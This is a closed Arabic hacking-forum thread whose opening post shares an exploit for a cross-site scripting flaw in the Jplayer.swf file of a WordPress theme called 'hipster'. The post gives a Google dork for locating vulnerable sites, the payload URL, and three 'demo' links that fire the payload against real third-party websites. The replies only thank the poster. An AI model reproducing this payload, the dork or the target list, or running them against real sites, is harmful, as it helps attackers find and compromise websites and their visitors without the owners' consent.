حالة الموضوع:
مغلق
  1. Ubuntu

    Ubuntu Developer

    الأنتساب:
    ‏6 يناير 2013
    المشاركات:
    62
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    8
    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله تعالى وبركاته

    كود PHP:
    X-------------------------------------------------------------X
     _____ _   _ _   _ _____ _____ _____  ___   _   _   _______   _______ ___________ 
    |_   _| | | | \ | |_   _/  ___|_   _|/ \ | \ | | /  __ \ \ / / ___ \  ______ \
      | | | | | |  \| | | | \ `
    --.  | | / /_\ \|  \| | | /  \/\ V /| |_/ / |__ | |_/ /
      | | | | | | . 
    ` | | |  `--. \ | | |  _  || . ` | | |     \ / | ___ \  __||    / 
      | | | |
    _| | |\  |_| |_/\__/ /_| |_| | | || |\  | | \__/\ | | | |_/ / |___| |\ \ 
      \
    _/  \___/\_| \_/\___/\____/ \___/\_| |_/\_| \_/  \____/ \_/ \____/\____/\_| \_|
    X-------------------------------------------------------------X                                                                                  
     
     
    ***91;+***93AuthorTUNISIAN CYBER
    ***91;+***93Exploit Title:  WordPress hipster (jplayer.swfCross Site Scripting vulnerability
    ***91;+***93Date4-12-2013
    ***91;+***93CategoryWebApp
    ***91;+***93Google Dorkinurl:"/wp-content/themes/moustachey"
    ***91;+***93Tested onWin7 ubuntu 13.04
     
     
    ########################################################################################

    Proof:

    http//127.0.0.1/***91;Path***93;/wp-content/themes/hipster/assets/javascripts/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!*****(/1337day%20TUNISIAN%20CYBER/)//

     
    Demos:
    http://www.oletimey.com/wp-content/themes/hipster/assets/javascripts/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!*****(/1337day%20TUNISIAN%20CYBER/)//
    http://brisbanefringe.com/wp-content/themes/hipster/assets/javascripts/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!*****(/1337day%20TUNISIAN%20CYBER/)//
    http://www.joeposa.com/wp-content/themes/hipster/assets/javascripts/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!*****(/1337day%20TUNISIAN%20CYBER/)//

    the rest google

    ./3nD
    ########################################################################################
     
  2. الراسي

    الراسي Developer

    الأنتساب:
    ‏18 ديسمبر 2011
    المشاركات:
    12
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الإقامة:
    في بلاد الكرم
    رد: WordPress hipster (jplayer.swf) Cross Site Scripting vulnerabilit

    يعطيك العافية ياغالي !$^@​
     
  3. NETJOURNAL

    NETJOURNAL مشرف

    الأنتساب:
    ‏18 مايو 2006
    المشاركات:
    676
    الإعجابات المتلقاة:
    1,543
    نقاط الجائزة:
    93
    الجنس:
    ذكر
    الوظيفة:
    ExploitCoding - ShellCoding - Defacer
    الإقامة:
    etc/shadow/~root
    رد: WordPress hipster (jplayer.swf) Cross Site Scripting vulnerabilit

    :{4}::{4}::{4}: مشكور
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة